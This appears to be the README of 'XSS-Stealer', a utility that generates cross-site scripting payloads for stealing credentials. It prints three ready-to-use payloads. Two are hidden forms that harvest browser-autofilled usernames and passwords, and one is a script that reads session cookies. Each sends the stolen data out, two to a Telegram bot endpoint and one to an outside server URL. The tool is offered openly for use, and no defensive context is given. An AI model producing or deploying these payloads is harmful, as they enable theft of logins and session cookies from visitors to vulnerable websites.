Simple utility to generate XSS-based stealers.
Install requirements:
pip install -r requirements.txt
Run:
python -m stealer
Steals the password and login using form autofill and sends it to the Telegram Bot.
XSS-Types:
- Reflected
- Stored
Result code:
<form style="display: none" onchange="fetch(`https://api.telegram.org/bot123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11/sendMessage?text=${this.u.value};${this.p.value}&chat_id=123123123`)"><input id="u" autocomplete="username"><input id="p" type="password" autocomplete="password"></form>
Steals the cookies and sends it to the Telegram Bot.
XSS-Types:
- Reflected
- Stored
Result code:
<script>fetch(`https://api.telegram.org/bot123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11/sendMessage?text=${document.cookie}&chat_id=123123123`)</script>
Steals the password and login using form autofill and sends it to the Server.
XSS-Types:
- Reflected
- Stored
<form style="display: none" onchange="fetch(`https://example.com?c=${this.u.value};${this.p.value}`)"><input id="u" autocomplete="username"><input id="p" type="password" autocomplete="password"></form>
XSS-Stealer is released under the MIT License. See the bundled LICENSE file for details.